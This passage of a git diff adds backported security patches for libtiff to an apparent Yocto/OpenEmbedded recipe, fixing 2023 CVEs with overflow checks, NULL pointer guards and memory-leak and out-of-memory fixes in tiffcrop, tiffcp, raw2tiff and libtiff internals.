+-    buffsize = (rowsize + 1) * length;
++    {
++        if (((tmsize_t)rowsize + 1) != 0 &&
++            (tmsize_t)length > ((TIFF_TMSIZE_T_MAX - NUM_BUFF_OVERSIZE_BYTES) /
++                                ((tmsize_t)rowsize + 1)))
++        {
++            TIFFError("rotateImage",
++                      "Integer overflow when calculating buffer size.");
++            return (-1);
++        }
++        buffsize = (rowsize + 1) * length;
++    }
+ 
+   bytes_per_sample = (bps + 7) / 8;
+   bytes_per_pixel  = ((bps * spp) + 7) / 8;
+@@ -8556,11 +8593,17 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
+   /* Add 3 padding bytes for extractContigSamplesShifted32bits */
+   if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
+     {
+-    TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
++    TIFFError("rotateImage",
++              "Unable to allocate rotation buffer of %" TIFF_SSIZE_FORMAT
++              " bytes ",
++              buffsize + NUM_BUFF_OVERSIZE_BYTES);
+     return (-1);
+     }
+   _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
+ 
++  if (rot_buf_size != NULL)
++	*rot_buf_size = buffsize;
++
+   ibuff = *ibuff_ptr;
+   switch (rotation)
+     {
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
new file mode 100644
index 0000000000..6a6596f092
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-25434-CVE-2023-25435.patch
@@ -0,0 +1,94 @@
+From 69818e2f2d246e6631ac2a2da692c3706b849c38 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sun, 29 Jan 2023 11:09:26 +0100
+Subject: [PATCH] tiffcrop: Amend rotateImage() not to toggle the input (main)
+ image width and length parameters when only cropped image sections are
+ rotated. Remove buffptr from region structure because never used.
+
+Closes #492 #493 #494 #495 #499 #518 #519
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/69818e2f2d246e6631ac2a2da692c3706b849c38]
+CVE: CVE-2023-25434 & CVE-2023-25435
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index aab0ec6..ce84414 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -531,7 +531,7 @@ static int rotateContigSamples24bits(uint16, uint16, uint16, uint32,
+ static int rotateContigSamples32bits(uint16, uint16, uint16, uint32, 
+                                      uint32,   uint32, uint8 *, uint8 *);
+ static int rotateImage(uint16, struct image_data *, uint32 *, uint32 *,
+-		       unsigned char **, size_t *);
++		       unsigned char **, size_t *, int);
+ static int mirrorImage(uint16, uint16, uint16, uint32, uint32,
+ 		       unsigned char *);
+ static int invertImage(uint16, uint16, uint16, uint32, uint32,
+@@ -6382,10 +6382,11 @@ static int  correct_orientation(struct image_data *image, unsigned char **work_b
+       /* Dummy variable in order not to switch two times the
+        * image->width,->length within rotateImage(),
+        * but switch xres, yres there. */
+-      uint32_t width = image->width;
+-      uint32_t length = image->length;
+-      if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL))
+-      {
++        uint32_t width = image->width;
++        uint32_t length = image->length;
++        if (rotateImage(rotation, image, &width, &length, work_buff_ptr, NULL,
++                        TRUE))
++        {
+       TIFFError ("correct_orientation", "Unable to rotate image");
+       return (-1);
+       }
+@@ -7612,7 +7613,8 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+        * accordingly. */
+       size_t rot_buf_size = 0;
+       if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                      &crop->combined_length, &crop_buff, &rot_buf_size))
++                      &crop->combined_length, &crop_buff, &rot_buf_size,
++                            FALSE))
+         {
+         TIFFError("processCropSelections", 
+                   "Failed to rotate composite regions by %d degrees", crop->rotation);
+@@ -7721,9 +7723,10 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
+            * its size individually. Therefore, seg_buffs size  needs to be
+            * updated accordingly. */
+            size_t rot_buf_size = 0;
+-           if (rotateImage(
+-                crop->rotation, image, &crop->regionlist[i].width,
+-                &crop->regionlist[i].length, &crop_buff, &rot_buf_size))
++           if (rotateImage(crop->rotation, image,
++                                &crop->regionlist[i].width,
++                                &crop->regionlist[i].length, &crop_buff,
++                                &rot_buf_size, FALSE))
+           {
+           TIFFError("processCropSelections", 
+                     "Failed to rotate crop region by %d degrees", crop->rotation);
+@@ -7853,7 +7856,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   if (crop->crop_mode & CROP_ROTATE) /* rotate should be last as it can reallocate the buffer */
+     {
+     if (rotateImage(crop->rotation, image, &crop->combined_width, 
+-                    &crop->combined_length, crop_buff_ptr, NULL))
++                    &crop->combined_length, crop_buff_ptr, NULL, TRUE))
+       {
+       TIFFError("createCroppedImage", 
+                 "Failed to rotate image or cropped selection by %d degrees", crop->rotation);
+@@ -8515,8 +8518,10 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
+ 
+ /* Rotate an image by a multiple of 90 degrees clockwise */
+ static int
+-rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width, 
+-            uint32 *img_length, unsigned char **ibuff_ptr, int rot_image_params)
++rotateImage(uint16 rotation, struct image_data *image,
++            uint32 *img_width, uint32 *img_length,
++            unsigned char **ibuff_ptr, size_t *rot_buf_size,
++            int rot_image_params)
+   {
+   int      shift_width;
+   uint32   bytes_per_pixel, bytes_per_sample;
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
new file mode 100644
index 0000000000..b7a7e93764
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26965.patch
@@ -0,0 +1,90 @@
+From ec8ef90c1f573c9eb1f17d6a056aa0015f184acf Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Tue, 14 Feb 2023 20:43:43 +0100
+Subject: [PATCH] tiffcrop: Do not reuse input buffer for subsequent images.
+ Fix issue 527
+
+Reuse of read_buff within loadImage() from previous image is quite unsafe, because other functions (like rotateImage() etc.) reallocate that buffer with different size without updating the local prev_readsize value.
+
+Closes #527
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26965
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 40 ++++++++++------------------------------
+ 1 file changed, 10 insertions(+), 30 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index ce84414..a533089 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -5935,9 +5935,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+   uint32   tw = 0, tl = 0;       /* Tile width and length */
+   tmsize_t   tile_rowsize = 0;
+   unsigned char *read_buff = NULL;
+-  unsigned char *new_buff  = NULL;
+   int      readunit = 0;
+-  static   tmsize_t  prev_readsize = 0;
+ 
+   TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
+   TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
+@@ -6232,37 +6230,20 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+   read_buff = *read_ptr;
+   /* +3 : add a few guard bytes since reverseSamples16bits() can read a bit */
+   /* outside buffer */
+-  if (!read_buff)
++  if (read_buff)
+   {
+-    if( buffsize > 0xFFFFFFFFU - 3 )
+-    {
+-        TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+-        return (-1);
+-    }
+-    read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
++    _TIFFfree(read_buff);
+   }
+-  else
+-    {
+-    if (prev_readsize < buffsize)
+-    {
+-      if( buffsize > 0xFFFFFFFFU - 3 )
+-      {
+-          TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
+-          return (-1);
+-      }
+-      new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
+-      if (!new_buff)
+-        {
+-	free (read_buff);
+-        read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+-        }
+-      else
+-        read_buff = new_buff;
+-      }
+-    }
++  if (buffsize > 0xFFFFFFFFU - 3)
++  {
++    TIFFError("loadImage", "Required read buffer size too large");
++    return (-1);
++  }
++  read_buff =
++    (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
+   if (!read_buff)
+     {
+-    TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
++    TIFFError("loadImage", "Unable to allocate read buffer");
+     return (-1);
+     }
+ 
+@@ -6270,7 +6251,6 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
+   read_buff[buffsize+1] = 0;
+   read_buff[buffsize+2] = 0;
+ 
+-  prev_readsize = buffsize;
+   *read_ptr = read_buff;
+ 
+   /* N.B. The read functions used copy separate plane data into a buffer as interleaved
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
new file mode 100644
index 0000000000..48657e6aa4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-26966.patch
@@ -0,0 +1,35 @@
+From b0e1c25dd1d065200c8d8f59ad0afe014861a1b9 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Thu, 16 Feb 2023 12:03:16 +0100
+Subject: [PATCH] tif_luv: Check and correct for NaN data in uv_encode().
+
+Closes #530
+
+Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz]
+CVE: CVE-2023-26966
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_luv.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/libtiff/tif_luv.c b/libtiff/tif_luv.c
+index 6fe4858..8b2c5f1 100644
+--- a/libtiff/tif_luv.c
++++ b/libtiff/tif_luv.c
+@@ -923,6 +923,13 @@ uv_encode(double u, double v, int em)	/* encode (u',v') coordinates */
+ {
+ 	register int	vi, ui;
+ 
++	/* check for NaN */
++	if (u != u || v != v)
++	{
++		u = U_NEU;
++		v = V_NEU;
++        }
++
+ 	if (v < UV_VSTART)
+ 		return oog_encode(u, v);
+ 	vi = itrunc((v - UV_VSTART)*(1./UV_SQSIZ), em);
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
new file mode 100644
index 0000000000..62a5e1831c
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-2908.patch
@@ -0,0 +1,33 @@
+From 8c0859a80444c90b8dfb862a9f16de74e16f0a9e Mon Sep 17 00:00:00 2001
+From: xiaoxiaoafeifei <lliangliang2007@163.com>
+Date: Fri, 21 Apr 2023 13:01:34 +0000
+Subject: [PATCH] countInkNamesString(): fix `UndefinedBehaviorSanitizer`:
+ applying zero offset to null pointer
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/9bd48f0dbd64fb94dc2b5b05238fde0bfdd4ff3f]
+CVE: CVE-2023-2908
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_dir.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
+index 9d8267a..6389b40 100644
+--- a/libtiff/tif_dir.c
++++ b/libtiff/tif_dir.c
+@@ -145,10 +145,10 @@ static uint16
+ countInkNamesString(TIFF *tif, uint32 slen, const char *s)
+ {
+ 	uint16 i = 0;
+-	const char *ep = s + slen;
+-	const char *cp = s;
+ 
+ 	if (slen > 0) {
++		const char *ep = s + slen;
++	        const char *cp = s;
+ 		do {
+ 			for (; cp < ep && *cp != '\0'; cp++) {}
+ 			if (cp >= ep)
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
new file mode 100644
index 0000000000..8db24fc714
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3316.patch
@@ -0,0 +1,59 @@
+From d63de61b1ec3385f6383ef9a1f453e4b8b11d536 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 3 Feb 2023 17:38:55 +0100
+Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
+
+Closes #515
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
+CVE: CVE-2023-3316
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_close.c | 11 +++++++----
+ tools/tiffcrop.c    |  5 ++++-
+ 2 files changed, 11 insertions(+), 5 deletions(-)
+
+diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
+index e4228df..335e80f 100644
+--- a/libtiff/tif_close.c
++++ b/libtiff/tif_close.c
+@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
+  */
+ 
+ void
+-TIFFClose(TIFF* tif)
++TIFFClose(TIFF *tif)
+ {
+-	TIFFCloseProc closeproc = tif->tif_closeproc;
+-	thandle_t fd = tif->tif_clientdata;
++    if (tif != NULL)
++    {
++        TIFFCloseProc closeproc = tif->tif_closeproc;
++        thandle_t fd = tif->tif_clientdata;
+ 
+ 	TIFFCleanup(tif);
+-	(void) (*closeproc)(fd);
++        (void)(*closeproc)(fd);
++    }
+ }
+ 
+ /* vim: set ts=8 sts=8 sw=8 noet: */
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a533089..f14bb0c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
+       }
+     }
+ 
+-  TIFFClose(out);
++    if (out != NULL)
++    {
++        TIFFClose(out);
++    }
+ 
+   return (0);
+   } /* end main */
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
+From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Tue, 7 Mar 2023 15:02:08 +0800
+Subject: [PATCH] Fix memory leak in tiffcrop.c
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
+CVE: CVE-2023-3576
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcrop.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f14bb0c..7121c7c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ 
+   read_buff = *read_buff_ptr;
+ 
++  /* Memory is freed before crop_buff_ptr is overwritten */
++    if (*crop_buff_ptr != NULL)
++    {
++	_TIFFfree(*crop_buff_ptr);
++    }
++
+   /* process full image, no crop buffer needed */
+-  crop_buff = read_buff;
+   *crop_buff_ptr = read_buff;
+   crop->combined_width = image->width;
+   crop->combined_length = image->length;
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
+From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 5 May 2023 19:43:46 +0200
+Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
+CVE: CVE-2023-3618
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 14 ++++++++++----
+ 1 file changed, 10 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 7121c7c..93b7f96 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
+         {  /* Whole image or sections not based on output page size */
+         if (crop.selections > 0)
+           {
+-	  writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
+-                          mp, argv[argc - 1], &next_page, total_pages);
+-          }
++             if (writeSelections(in, &out, &crop, &image, &dump,
++                                 seg_buffs, mp, argv[argc - 1],
++                                 &next_page, total_pages))
++              {
++                TIFFError("main",
++                          "Unable to write new image selections");
++                exit(EXIT_FAILURE);
++              }
++	  }
+ 	else  /* One file all images and sections */
+           {
+ 	  if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
+@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+   /* Memory is freed before crop_buff_ptr is overwritten */
+     if (*crop_buff_ptr != NULL)
+     {
+-	_TIFFfree(*crop_buff_ptr);
++       _TIFFfree(*crop_buff_ptr);
+     }
+ 
+   /* process full image, no crop buffer needed */
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
new file mode 100644
index 0000000000..6eb286039f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
+From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:34:25 +0000
+Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
+ (fixes #591)
+
+Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
+CVE: CVE-2023-40745
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcp.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 83b3910..007bd05 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
+ 		TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
+ 		return 0;
+ 	}
++
++	if ( (imagew - tilew * spp) > INT_MAX ){
++        TIFFError(TIFFFileName(in),
++                  "Error, image raster scan line size is too large");
++        return 0;
++	}
++
+ 	iskew = imagew - tilew*spp;
+ 	tilebuf = _TIFFmalloc(tilesize);
+ 	if (tilebuf == 0)
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
new file mode 100644
index 0000000000..3f44a42012
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
+From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:40:01 +0000
+Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
+CVE: CVE-2023-41175
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
+index ab36ff4e..a905da52 100644
+--- a/tools/raw2tiff.c
++++ b/tools/raw2tiff.c
+@@ -35,6 +35,7 @@
+ #include <sys/types.h>
+ #include <math.h>
+ #include <ctype.h>
++#include <limits.h>
+ 
+ #ifdef HAVE_UNISTD_H
+ # include <unistd.h>
+@@ -101,6 +102,7 @@ main(int argc, char* argv[])
+ 	int	fd;
+ 	char	*outfilename = NULL;
+ 	TIFF	*out;
++	uint32  temp_limit_check = 0;
+ 
+ 	uint32 row, col, band;
+ 	int	c;
+@@ -212,6 +214,30 @@ main(int argc, char* argv[])
+ 	if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
+ 		return 1;
+ 
++	if ((width == 0) || (length == 0) ){
++		fprintf(stderr, "Too large nbands value specified.\n");
++		return (EXIT_FAILURE);
++	}
++
++	temp_limit_check = nbands * depth;
++
++	if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) )  {
++		fprintf(stderr, "Too large length size specified.\n");
++		return (EXIT_FAILURE);
++	}
++	temp_limit_check = temp_limit_check * length;
++
++	if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) )  {
++		fprintf(stderr, "Too large width size specified.\n");
++		return (EXIT_FAILURE);
++	}
++	temp_limit_check = temp_limit_check * width;
++
++	if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) )  {
++		fprintf(stderr, "Too large header size specified.\n");
++		return (EXIT_FAILURE);
++	}
++
+ 	if (outfilename == NULL)
+ 		outfilename = argv[optind+1];
+ 	out = TIFFOpen(outfilename, "w");
+-- 
+2.30.2
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
new file mode 100644
index 0000000000..1b651e6529
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 15:58:41 +0100
+Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
+ col/row (fixes #622)
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
+Upstream commit  https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
+CVE: CVE-2023-52356
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_getimage.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
++++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
+@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
+     }
+ 
+     if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
++        if (row >= img.height)
++        {
++            TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++                          "Invalid row passed to TIFFReadRGBAStrip().");
++            TIFFRGBAImageEnd(&img);
++            return (0);
++        }
+ 
+         img.row_offset = row;
+         img.col_offset = 0;
+@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
+ 	    return( 0 );
+     }
+ 
++    if (col >= img.width || row >= img.height)
++    {
++        TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++                      "Invalid row/col passed to TIFFReadRGBATile().");
++        TIFFRGBAImageEnd(&img);
++        return (0);
++    }
++
+     /*
+      * The TIFFRGBAImageGet() function doesn't allow us to get off the
+      * edge of the image, even to fill an otherwise valid tile.  So we
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
new file mode 100644
index 0000000000..a777dea9b0
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
+From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 9 Sep 2023 15:45:47 +0200
+Subject: [PATCH] Check also if codec of input image is available,
+ independently from codec check of output image and return with error if not.
+ Fixes #606.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
+CVE: CVE-2023-6228
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 007bd05..d2f7b66 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
+ 	else
+ 		CopyField(TIFFTAG_COMPRESSION, compression);
+ 	TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
++	if (!TIFFIsCODECConfigured(input_compression))
++	    return FALSE;
+ 	TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
+ 	if (input_compression == COMPRESSION_JPEG) {
+ 		/* Force conversion to RGB */
+-- 
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
new file mode 100644
index 0000000000..e955b3f2e4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . included inttypes.h header to support PRIu32 and PRIu64;
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+ . calls to the check size, that is the idea of the patch, were added before
+   _TIFFCheckMalloc and may note match the original patch methods;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 31 Oct 2023 15:43:29 +0000
+Subject: [PATCH] Prevent some out-of-memory attacks
+
+Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
+
+At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
+
+See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
+Upstream commit  https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 90 insertions(+), 2 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -37,6 +37,7 @@
+ #include "tiffiop.h"
+ #include <float.h>
+ #include <stdlib.h>
++#include <inttypes.h>
+ 
+ #define FAILED_FII    ((uint32) -1)
+ 
+@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
+ 	datasize=(*count)*typesize;
+ 	assert((tmsize_t)datasize>0);
+ 
++	/* Before allocating a huge amount of memory for corrupted files, check if
++	 * size of requested memory is not greater than file size.
++	 */
++	uint64 filesize = TIFFGetFileSize(tif);
++	if (datasize > filesize)
++	{
++		TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++						"Requested memory size for tag %d (0x%x) %" PRIu32
++						" is greather than filesize %" PRIu64
